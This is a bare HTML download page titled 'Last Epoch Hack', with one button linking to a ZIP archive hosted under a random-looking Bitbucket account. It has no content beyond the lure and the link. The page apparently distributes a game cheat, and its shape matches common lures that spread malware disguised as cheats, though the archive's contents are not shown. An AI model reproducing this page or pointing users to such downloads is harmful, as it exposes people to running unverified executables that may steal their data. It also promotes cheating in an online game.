<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Last Epoch Hack</title>
    <style>
        body {
            margin: 0;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            background: linear-gradient(135deg, #ffffff 25%, #e6e6e6 25%, #e6e6e6 50%, #ffffff 50%, #ffffff 75%, #e6e6e6 75%, #e6e6e6 100%);
            background-size: 400% 400%;
            animation: gradient 15s ease infinite;
            font-family: Arial, sans-serif;
        }

        @keyframes gradient {
            0% { background-position: 0% 50%; }
            50% { background-position: 100% 50%; }
            100% { background-position: 0% 50%; }
        }

        h1 {
            margin-bottom: 20px;
            font-size: 2em;
            color: #333;
        }

        .download-button {
            padding: 20px 40px;
            font-size: 1.5em;
            color: white;
            background-color: #007bff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .download-button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <h1>Last Epoch Hack</h1>
    <a href="https://bitbucket.org/amitafgg4/amitar32dd/downloads/LastEpochBG.zip" download>
        <button class="download-button">Download</button>
    </a>
</body>
</html>
